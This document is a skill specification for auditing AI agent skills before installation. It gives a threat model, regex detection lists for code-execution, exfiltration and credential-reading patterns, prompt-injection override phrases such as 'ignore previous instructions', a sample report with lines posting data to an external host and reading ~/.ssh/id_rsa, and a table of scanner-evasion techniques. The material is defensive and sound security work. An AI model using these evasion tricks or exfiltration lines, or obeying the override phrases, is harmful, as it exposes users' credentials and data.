Skill Security Auditor

Tier: POWERFUL Category: Engineering / Security Maintainer: Claude Skills Team

Overview

Scan and audit AI agent skills for security risks before installation. Performs static analysis on code files for dangerous patterns, scans markdown files for prompt injection, validates dependency supply chains, checks file system boundaries, and detects obfuscation. Produces a structured PASS / WARN / FAIL verdict with findings categorized by severity and actionable remediation guidance.

Keywords

skill security, AI security, prompt injection, code audit, supply chain, dependency scanning, data exfiltration, credential harvesting, obfuscation detection, pre-install security

Core Capabilities

1. Code Execution Risk Detection

• Command injection: os.system(), subprocess.call(shell=True), backtick execution
• Code execution: eval(), exec(), compile(), __import__()
• Obfuscation: base64-encoded payloads, hex strings, chr() chains
• Network exfiltration: requests.post(), socket.connect(), httpx, aiohttp
• Credential harvesting: reads from ~/.ssh, ~/.aws, ~/.config
• Privilege escalation: sudo, chmod 777, setuid, cron manipulation

2. Prompt Injection Detection

• System prompt override: "Ignore previous instructions"
• Role hijacking: "Act as root", "Pretend you have no restrictions"
• Safety bypass: "Skip safety checks", "Disable content filtering"
• Hidden instructions: zero-width characters, HTML comments with directives
• Data extraction: "Send contents of", "Upload file to", "POST to"
• Excessive permissions: "Run any command", "Full filesystem access"

3. Supply Chain Analysis

• Known vulnerabilities in pinned dependencies
• Typosquatting detection (packages similar to popular ones)
• Unpinned versions that may introduce vulnerabilities
• pip install or npm install commands inside scripts
• Packages with low download counts or recent creation dates

4. File System and Structure Validation

• Scripts referencing paths outside skill directory
• Hidden files (.env, dotfiles) that should not be in a skill
• Unexpected binary files (.exe, .so, .dll)
• Symbolic links pointing outside the skill boundary
• Large files that could hide payloads

When to Use

• Evaluating a skill from an untrusted source before installation
• Pre-install security gate for CI/CD pipelines
• Auditing a skill directory or git repository for malicious code
• Reviewing skills before adding them to a team's approved list
• Post-incident scanning of installed skills

Threat Model

Attack Vectors Against AI Skills

Vector	How It Works	Risk Level
Code execution in scripts	Skill includes Python/Bash scripts with eval(), os.system(), or subprocess that execute arbitrary commands	CRITICAL
Prompt injection in SKILL.md	Markdown contains hidden instructions that override the AI assistant's behavior when the skill is loaded	CRITICAL
Network exfiltration	Scripts send local data (code, credentials, env vars) to external servers	CRITICAL
Credential harvesting	Scripts read SSH keys, AWS credentials, or API tokens from well-known paths	CRITICAL
Dependency poisoning	requirements.txt includes typosquatted or backdoored packages	HIGH
File system escape	Scripts write to ~/.bashrc, /etc/, or other system locations	HIGH
Obfuscated payloads	Malicious code hidden via base64 encoding, hex strings, or chr() construction	HIGH
Binary payloads	Pre-compiled executables bypass code review	HIGH
Symlink attacks	Symbolic links redirect file operations to sensitive locations	MEDIUM
Information disclosure	Excessive logging or error output reveals system information	LOW

Trust Boundaries

TRUSTED ZONE:
  ├── Skill markdown files (SKILL.md, references/)
  │   └── Should contain ONLY documentation and templates
  ├── Configuration files (YAML, JSON, TOML)
  │   └── Should contain ONLY settings, no executable code
  └── Template files (assets/)
      └── Should contain ONLY user-facing templates

INSPECTION REQUIRED:
  ├── Python scripts (scripts/*.py)
  │   └── May contain legitimate automation — inspect each function
  ├── Shell scripts (scripts/*.sh)
  │   └── Check for pipes to external servers, eval, sudo
  └── JavaScript/TypeScript (scripts/*.js, *.ts)
      └── Check for eval, Function constructor, network calls

REJECT BY DEFAULT:
  ├── Binary files (.exe, .so, .dll, .pyc)
  ├── Hidden directories (.hidden/)
  ├── Environment files (.env, .env.local)
  └── Credential files (*.pem, *.key, *.p12)

Scanning Patterns

Code Execution Risks

# Patterns to detect in .py, .sh, .js, .ts files

CRITICAL_PATTERNS = {
    "command_injection": [
        r"os\.system\(",
        r"os\.popen\(",
        r"subprocess\.call\(.*shell\s*=\s*True",
        r"subprocess\.Popen\(.*shell\s*=\s*True",
        r"`[^`]+`",  # backtick execution in shell
    ],
    "code_execution": [
        r"\beval\(",
        r"\bexec\(",
        r"\bcompile\(",
        r"__import__\(",
        r"importlib\.import_module\(",
        r"new\s+Function\(",  # JavaScript
    ],
    "obfuscation": [
        r"base64\.b64decode\(",
        r"codecs\.decode\(",
        r"bytes\.fromhex\(",
        r"chr\(\d+\)\s*\+\s*chr\(",  # chr() chains
        r"\\x[0-9a-f]{2}.*\\x[0-9a-f]{2}.*\\x[0-9a-f]{2}",  # hex strings
    ],
    "network_exfiltration": [
        r"requests\.post\(",
        r"requests\.put\(",
        r"urllib\.request\.urlopen\(",
        r"httpx\.(post|put)\(",
        r"aiohttp\.ClientSession\(",
        r"socket\.connect\(",
        r"fetch\(['\"]https?://",  # JavaScript
    ],
    "credential_harvesting": [
        r"~/.ssh",
        r"~/.aws",
        r"~/.config",
        r"~/.gnupg",
        r"os\.environ\[",  # reading env vars
        r"open\(.*\.pem",
        r"open\(.*\.key",
    ],
    "privilege_escalation": [
        r"\bsudo\b",
        r"chmod\s+777",
        r"chmod\s+\+s",
        r"crontab",
        r"setuid",
    ],
}

HIGH_PATTERNS = {
    "unsafe_deserialization": [
        r"pickle\.loads?\(",
        r"yaml\.load\([^)]*\)",  # without SafeLoader
        r"marshal\.loads?\(",
        r"shelve\.open\(",
    ],
    "file_system_abuse": [
        r"open\(.*/etc/",
        r"open\(.*~/.bashrc",
        r"open\(.*~/.profile",
        r"open\(.*~/.zshrc",
        r"os\.symlink\(",
        r"shutil\.(rmtree|move)\(",
    ],
}

Prompt Injection Detection

# Patterns to detect in .md files

PROMPT_INJECTION_PATTERNS = {
    "system_override": [
        r"ignore\s+(all\s+)?previous\s+instructions",
        r"ignore\s+(all\s+)?prior\s+instructions",
        r"disregard\s+(all\s+)?previous",
        r"you\s+are\s+now\s+(a|an)\s+",
        r"from\s+now\s+on\s+(you|your)\s+",
        r"new\s+system\s+prompt",
        r"override\s+system",
    ],
    "role_hijacking": [
        r"act\s+as\s+(root|admin|superuser)",
        r"pretend\s+you\s+(have\s+no|don't\s+have)\s+restrictions",
        r"you\s+have\s+no\s+limitations",
        r"unrestricted\s+mode",
        r"developer\s+mode\s+enabled",
        r"jailbreak",
    ],
    "safety_bypass": [
        r"skip\s+safety\s+checks",
        r"disable\s+content\s+filter",
        r"bypass\s+security",
        r"remove\s+(all\s+)?guardrails",
        r"no\s+restrictions\s+apply",
    ],
    "data_extraction": [
        r"send\s+(the\s+)?contents?\s+of",
        r"upload\s+file\s+to",
        r"POST\s+to\s+https?://",
        r"exfiltrate",
        r"transmit\s+data\s+to",
    ],
    "hidden_instructions": [
        r"\u200b",          # zero-width space
        r"\u200c",          # zero-width non-joiner
        r"\u200d",          # zero-width joiner
        r"\ufeff",          # byte order mark
        r"<!--\s*(?:system|instruction|command)",  # HTML comments with directives
    ],
}

Audit Report Format

+=============================================+
|  SKILL SECURITY AUDIT REPORT                |
|  Skill: example-skill                       |
|  Date: 2026-03-09                           |
|  Verdict: FAIL                              |
+=============================================+
|  CRITICAL: 2  |  HIGH: 1  |  INFO: 3       |
+=============================================+

CRITICAL [CODE-EXEC] scripts/helper.py:42
  Pattern: eval(user_input)
  Risk: Arbitrary code execution from untrusted input
  Fix: Replace eval() with ast.literal_eval() or explicit parsing

CRITICAL [NET-EXFIL] scripts/analyzer.py:88
  Pattern: requests.post("https://external.com/collect", data=results)
  Risk: Data exfiltration to external server
  Fix: Remove outbound network calls or verify destination is trusted
  and explicitly documented

HIGH [FS-BOUNDARY] scripts/scanner.py:15
  Pattern: open(os.path.expanduser("~/.ssh/id_rsa"))
  Risk: Reads SSH private key outside skill scope
  Fix: Remove filesystem access outside skill directory

INFO [DEPS-UNPIN] requirements.txt:3
  Pattern: requests>=2.0
  Risk: Unpinned dependency may introduce vulnerabilities
  Fix: Pin to specific version: requests==2.31.0

INFO [LARGE-FILE] assets/data.bin (2.4MB)
  Risk: Large binary file may hide payloads
  Fix: Verify file contents or remove if unnecessary

INFO [SUBPROCESS-SAFE] scripts/lint.py:22
  Pattern: subprocess.run(["ruff", "check", "."])
  Note: Safe usage with list args and no shell=True

Verdict Criteria

Verdict	Criteria	Action
PASS	Zero CRITICAL, zero HIGH findings	Safe to install
WARN	Zero CRITICAL, one or more HIGH findings	Review HIGH findings manually before installing
FAIL	One or more CRITICAL findings	Do NOT install without remediation

Strict Mode

In strict mode (for CI/CD gates), any HIGH finding upgrades the verdict to FAIL.

CI/CD Integration

# .github/workflows/audit-skills.yml
name: Skill Security Audit
on:
  pull_request:
    paths:
      - 'skills/**'
      - 'engineering/**'

jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: Audit changed skills
        run: |
          CHANGED_SKILLS=$(git diff --name-only origin/main... | grep -oP '(skills|engineering)/[^/]+' | sort -u)
          EXIT=0
          for skill in $CHANGED_SKILLS; do
            echo "Auditing: $skill"
            python3 scripts/skill_security_auditor.py "$skill" --strict --json >> audit-results.jsonl
            if [ $? -ne 0 ]; then EXIT=1; fi
          done
          exit $EXIT

      - name: Upload audit results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: skill-audit-results
          path: audit-results.jsonl

Manual Audit Checklist

When automated scanning is not available, use this manual checklist:

### Code Files (.py, .sh, .js, .ts)
- [ ] No eval(), exec(), or compile() calls
- [ ] No os.system() or subprocess with shell=True
- [ ] No outbound network requests (requests.post, fetch, socket)
- [ ] No reads from ~/.ssh, ~/.aws, ~/.config, or other user directories
- [ ] No writes outside the skill directory
- [ ] No base64 decoding of unknown payloads
- [ ] No sudo, chmod 777, or privilege escalation
- [ ] No pickle.loads() or unsafe YAML loading
- [ ] subprocess calls use list arguments, not strings

### Markdown Files (SKILL.md, references/*.md)
- [ ] No "ignore previous instructions" or similar overrides
- [ ] No "act as root/admin" or role hijacking
- [ ] No hidden zero-width characters (paste into a hex editor to check)
- [ ] No HTML comments containing instructions
- [ ] No instructions to send data to external URLs
- [ ] No requests for "full filesystem access" or "run any command"

### Dependencies (requirements.txt, package.json)
- [ ] All versions pinned to exact (==, not >=)
- [ ] Package names verified against official repositories
- [ ] No typosquatting (reqeusts, colourma, etc.)
- [ ] No pip install or npm install commands in scripts

### File Structure
- [ ] No .env or credential files
- [ ] No binary executables (.exe, .so, .dll)
- [ ] No symbolic links
- [ ] No files larger than 1MB without clear justification
- [ ] No hidden directories (.hidden/)

Known Evasion Techniques

Attackers may try to bypass detection. Be aware of:

Technique	Example	Detection Difficulty
String concatenation	e + v + a + l	Medium — check for dynamic function construction
getattr dispatch	getattr(os, 'sys' + 'tem')('cmd')	Hard — requires control flow analysis
Import aliasing	from os import system as helper	Medium — track import aliases
Encoded payloads	exec(base64.b64decode('...'))	Easy — flag any base64 decode + exec
Time-delayed triggers	Executes only after specific date	Hard — requires dynamic analysis
Conditional activation	Triggers only on specific hostnames	Hard — requires dynamic analysis
Unicode homoglyphs	Using Cyrillic characters that look like Latin	Medium — normalize Unicode before scanning

Limitations

• Static analysis only — does not execute code; cannot detect runtime-only behavior
• Pattern-based detection — sufficiently creative obfuscation may bypass detection
• No live CVE database — dependency checks use local patterns, not real-time vulnerability feeds
• Cannot detect logic bombs — time-delayed or conditional payloads require dynamic analysis
• Limited to known patterns — novel attack techniques may not be covered

When in doubt after an audit, do not install. Ask the skill author for clarification on any flagged patterns.

Common Pitfalls

• Trusting skills from "official" sources without auditing — supply chain attacks target popular packages
• Skipping audit for "small" skills — a single eval() in a 10-line script is enough
• Auditing only code, not markdown — prompt injection in SKILL.md is a real attack vector
• Ignoring INFO findings — they accumulate and indicate poor security hygiene
• No re-audit after skill updates — each version needs independent verification

Best Practices

1. Audit before install, always — treat every skill as untrusted until verified
2. Use strict mode in CI — any HIGH finding blocks the merge
3. Pin all dependencies — unpinned versions are a supply chain risk
4. Verify package names — typosquatting is common and effective
5. Check file boundaries — skills should never access paths outside their directory
6. Re-audit on updates — each new version may introduce new risks
7. Maintain an approved skill list — pre-audited skills that the team trusts
8. Report suspicious skills — notify the skill repository maintainer and community